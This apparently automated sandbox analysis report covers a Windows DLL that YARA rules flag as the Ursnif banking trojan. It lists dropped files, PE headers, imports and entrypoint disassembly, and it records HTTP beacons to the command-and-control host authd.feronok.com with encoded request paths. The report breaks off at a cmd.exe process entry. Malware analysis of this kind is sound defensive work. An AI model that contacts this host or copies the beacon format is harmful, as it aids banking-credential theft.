SHA-256:	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512:	717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious:	false
IE Cache URL:	res://ieframe.dll/http_404.htm
Preview:	.<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4113
Entropy (8bit):	7.9370830126943375
Encrypted:	false
SSDEEP:	96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
MD5:	5565250FCC163AA3A79F0B746416CE69
SHA1:	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
SHA-256:	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
SHA-512:	E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
Malicious:	false
IE Cache URL:	res://ieframe.dll/info_48.png
Preview:	.PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..\|........7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....\|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.\|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg....

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.519406083343313
Encrypted:	false
SSDEEP:	3:oVXUbVbfALmqRAW8JOGXnEbVbfALmgn:o9UpubR9qEpuf
MD5:	C9577366B230E3D02989EBAE9039B378
SHA1:	E7A71B648ECE0114729875CD56C41BB39738933D
SHA-256:	26CBDD7D48376CF1A596B4DD0988F22A24394BCE856656C45F8F2D0F98725C4C
SHA-512:	EA40288894F985A9DC922080B930D38AACEBD3E6B60936947F28BE5837DBBCAC5E3B598D402ECB001A56AEE2B8C227FF20201D1DCCE9208E69557FE0DA1FB3D7
Malicious:	false
Preview:	[2021/06/08 03:05:25.174] Latest deploy version: ..[2021/06/08 03:05:25.174] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF576B8A5F529C2713.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40105
Entropy (8bit):	0.6631678670645941
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+2wqDwBwd6QZ2oRwd6QZ2oawd6QZ2ov:kBqoxKAuqR+2wqDwBs/Rs/as/v
MD5:	425B698152378D38042530C60D4CBF41
SHA1:	4D04296F6B32E8D5D6B7E6F48EBAFFEC5FBC9642
SHA-256:	8FFC223AF114D5767DC8C75CB0F52959B12E762D46A07694526B50FAFA59102F
SHA-512:	B29FDE80E5E826EB2C8EB246867884819CA38B6916BD9054210AB9DD5798997CB62544709DC6B8A4DA80C9F6982C253B19E5F4449BC736611193A73B5DEBB5A0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF911219CB699D8BEF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40990877031581757
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loHF9loF9lW5Wcv:kBqoIOw5Wcv
MD5:	4C4A4BC5DD5CF7031A47ECDABADC6329
SHA1:	7AEB5294FD7C7389A8922365F152536E38968767
SHA-256:	C3650AAE56849635B121E3C56D0BD1B427FBDC5A841E19F11E6EE4617D68C376
SHA-512:	444026F7C86993A291A377F0776EB8AFB2FCEC3CBCA324CB82473C1F7BFA6B49A67ED4360B5970F40B5EE19EF6213702C4C87FDFE599F11F1B2AE5DB9EDB18B0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.141114890416556
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HP7cjYBnlS.dll
File size:	854016
MD5:	b8bc8b1740b329ff2baf16bcee6ca23d
SHA1:	d9215e03d2ddae00041a4ddd731872025b3ce537
SHA256:	aafda6138e0a43b153cc003b11f3e5fa8bf9e929d2356ec536b931a0ce983aa1
SHA512:	526cee6275372aaa9a34e51a42e607e940b2c0652b45aa3acf5a2b92b8cda6dc1c117d891d64fc93e013869e8244615b7d5d76c2c9c89b02920a11d97a4ed4af
SSDEEP:	24576:QqUdwbd9vSNvA2rqFIYURXYdjB/i37HHgvd:/jR9v6LrqCYURXY3irHc
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............F...F...F...G...F...GQ..F...G...F...G...F...G...F...G...Fo4.F...F...F...F...G...F...G...F...F...F...G...FRich...F.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10018d2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60B6D651 [Wed Jun 2 00:52:33 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3886a4d0545dd72353a1dfd84401a2b8

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FE6A08134F7h
call 00007FE6A0813866h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FE6A081339Ah
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0109202Ch]
push dword ptr [ebp+08h]
call dword ptr [01092028h]
push C0000409h
call dword ptr [01092030h]
push eax
call dword ptr [01092034h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007FE6A08520B2h
test eax, eax
je 00007FE6A08134F7h
push 00000002h
pop ecx
int 29h
mov dword ptr [010CEBB8h], eax
mov dword ptr [010CEBB4h], ecx
mov dword ptr [010CEBB0h], edx
mov dword ptr [010CEBACh], ebx
mov dword ptr [010CEBA8h], esi
mov dword ptr [010CEBA4h], edi
mov word ptr [010CEBD0h], ss
mov word ptr [010CEBC4h], cs
mov word ptr [010CEBA0h], ds
mov word ptr [010CEB9Ch], es
mov word ptr [010CEB98h], fs
mov word ptr [010CEB94h], gs
pushfd
pop dword ptr [010CEBC8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [010CEBBCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [010CEBC0h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xcd560	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcd5b4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11d000	0x18c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11e000	0x28cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xcc320	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xcc378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x92000	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x90db8	0x90e00	False	0.659131659836	data	6.69653105184	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x92000	0x3bde4	0x3be00	False	0.48056253262	data	3.78544205249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xce000	0x4eaf8	0xc00	False	0.1875	data	2.43696270839	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x11d000	0x18c	0x200	False	0.44140625	data	2.58715666458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11e000	0x28cc	0x2a00	False	0.792503720238	data	6.63746947151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_STRING	0x11d058	0x134	data	English	United States

Imports

DLL

Import

KERNEL32.dll

EnterCriticalSection, InitializeCriticalSection, GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, FileTimeToLocalFileTime, VirtualProtectEx, CreateSemaphoreA, CreateEventA, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedPushEntrySList, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetStdHandle, GetFileType, CloseHandle, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetProcessHeap, SetConsoleCtrlHandler, CreateFileW, GetStringTypeW, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapSize, HeapReAlloc, GetFileSizeEx, SetFilePointerEx, SetEndOfFile, OutputDebugStringW, DecodePointer

Exports

Name	Ordinal	Address
Lastinch	1	0x1043060
Ownof	2	0x1043800

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2021 03:05:26.255386114 CEST	49735	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:26.266657114 CEST	49736	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:26.300116062 CEST	80	49735	47.254.173.212	192.168.2.3
Jun 8, 2021 03:05:26.300379992 CEST	49735	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:26.310885906 CEST	80	49736	47.254.173.212	192.168.2.3
Jun 8, 2021 03:05:26.311110020 CEST	49736	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:26.646472931 CEST	49735	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:26.731766939 CEST	80	49735	47.254.173.212	192.168.2.3
Jun 8, 2021 03:05:27.181036949 CEST	80	49735	47.254.173.212	192.168.2.3
Jun 8, 2021 03:05:27.181283951 CEST	49735	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:28.019114971 CEST	49735	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:05:28.062119007 CEST	80	49735	47.254.173.212	192.168.2.3
Jun 8, 2021 03:05:29.740127087 CEST	49736	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.848747969 CEST	49742	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.848762989 CEST	49743	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.892329931 CEST	80	49742	47.254.173.212	192.168.2.3
Jun 8, 2021 03:06:09.892390966 CEST	80	49743	47.254.173.212	192.168.2.3
Jun 8, 2021 03:06:09.892503023 CEST	49742	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.892636061 CEST	49743	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.892807961 CEST	49743	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:09.975918055 CEST	80	49743	47.254.173.212	192.168.2.3
Jun 8, 2021 03:06:10.420274019 CEST	80	49743	47.254.173.212	192.168.2.3
Jun 8, 2021 03:06:10.421303034 CEST	49743	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:10.425067902 CEST	49743	80	192.168.2.3	47.254.173.212
Jun 8, 2021 03:06:10.467839003 CEST	80	49743	47.254.173.212	192.168.2.3
Jun 8, 2021 03:06:11.399378061 CEST	49742	80	192.168.2.3	47.254.173.212

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2021 03:03:53.887357950 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:53.930304050 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:54.790776968 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:54.833729029 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:55.762388945 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:55.805064917 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:56.608129025 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:56.651253939 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:57.498533964 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:57.541637897 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:58.425652027 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:58.468106985 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 8, 2021 03:03:59.288882017 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:03:59.332226038 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:00.410928011 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:00.453489065 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:01.301215887 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:01.344189882 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:02.247392893 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:02.289864063 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:03.228874922 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:03.271970987 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:04.180484056 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:04.223069906 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:40.499506950 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:40.557962894 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:53.456028938 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:53.503914118 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:53.968537092 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:54.013453007 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 8, 2021 03:04:58.367465019 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:04:58.410317898 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:02.521806002 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:02.564882040 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:04.414787054 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:04.457453012 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:05.522499084 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:05.566132069 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:06.366199970 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:06.430274010 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:06.460670948 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:06.505604982 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:07.608341932 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:07.653544903 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:10.481306076 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:10.532599926 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:24.179352045 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:24.223557949 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:25.970415115 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:26.238073111 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:35.470452070 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:35.527858019 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:49.877763987 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:49.936877966 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:54.156085968 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:54.198821068 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:55.150901079 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:55.193712950 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:56.152946949 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:56.198575974 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 8, 2021 03:05:58.166364908 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:05:58.211977959 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 8, 2021 03:06:02.166790962 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:06:02.209151030 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 8, 2021 03:06:09.504678965 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:06:09.549288034 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 8, 2021 03:06:09.799335003 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 8, 2021 03:06:09.844717979 CEST	53	61946	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 8, 2021 03:05:25.970415115 CEST	192.168.2.3	8.8.8.8	0x7252	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 8, 2021 03:06:09.799335003 CEST	192.168.2.3	8.8.8.8	0x36e3	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 8, 2021 03:05:06.430274010 CEST	8.8.8.8	192.168.2.3	0xff59	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jun 8, 2021 03:05:26.238073111 CEST	8.8.8.8	192.168.2.3	0x7252	No error (0)	authd.feronok.com		47.254.173.212	A (IP address)	IN (0x0001)
Jun 8, 2021 03:06:09.844717979 CEST	8.8.8.8	192.168.2.3	0x36e3	No error (0)	authd.feronok.com		47.254.173.212	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

authd.feronok.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49735	47.254.173.212	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 8, 2021 03:05:26.646472931 CEST	1410	OUT	GET /5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2BQXv/jhaYgnRoJXbt0p9E/b8fATrD6qQYegBk/Z_2BGMca1pIbKyE0_2/B6xQROT_2/FVtM7cI_2F4AqKBZTcM8/ka_2F9uVk0Uf7i421qg/djhua0iQVsNSQqZdHOVnOp/1bWWjsxwMvE9P/MwkEBGYh/46lRSAqS_2BR6Lm5JNn7FqF/Gnvaxpv6Hg/PmOIMmhyTSho2PVt_/2FS0IBXGm_2B/SjjfTOvQzGo/_2FqD_2BGuMeOB/vnbxHYtmqGY_2BlpC/_2BvpW HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 8, 2021 03:05:27.181036949 CEST	1410	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Jun 2021 01:05:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49743	47.254.173.212	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 8, 2021 03:06:09.892807961 CEST	1555	OUT	GET /ft4uMX2U8DExkako/7nz7XYcy_2FPVr_/2FPwc_2Fs5FKMespD3/eoY8gKUtH/5APsBMu_2FYgV7VnT01F/UNasB5xyXVRAz2U9YlK/vPhVaOevuoWXkOwOuvQxwX/WzTW2Vxlbm5Dm/rPytLuLu/KL_2FHSOlQc2K_2BpO7JML7/v1pC4egQVv/iWGaiNgaqJFCdjHoy/PoXO84M5LLuy/jOUqBl_2Bse/EY7p0c9R6kAidR/RKeKXozKr_2B2DMk4uhLx/44Gh2U87rhzhq5q8/e3uXzWyPgLhp7zv/L1Iu0qPLA6WpCvBUhY/ZBphUq1tO/a9IY_2Fv/fGT HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 8, 2021 03:06:10.420274019 CEST	1556	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Jun 2021 01:06:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2160 Parent PID: 5780

General

Start time:	03:04:02
Start date:	08/06/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll'
Imagebase:	0xfc0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5460 Parent PID: 2160

General

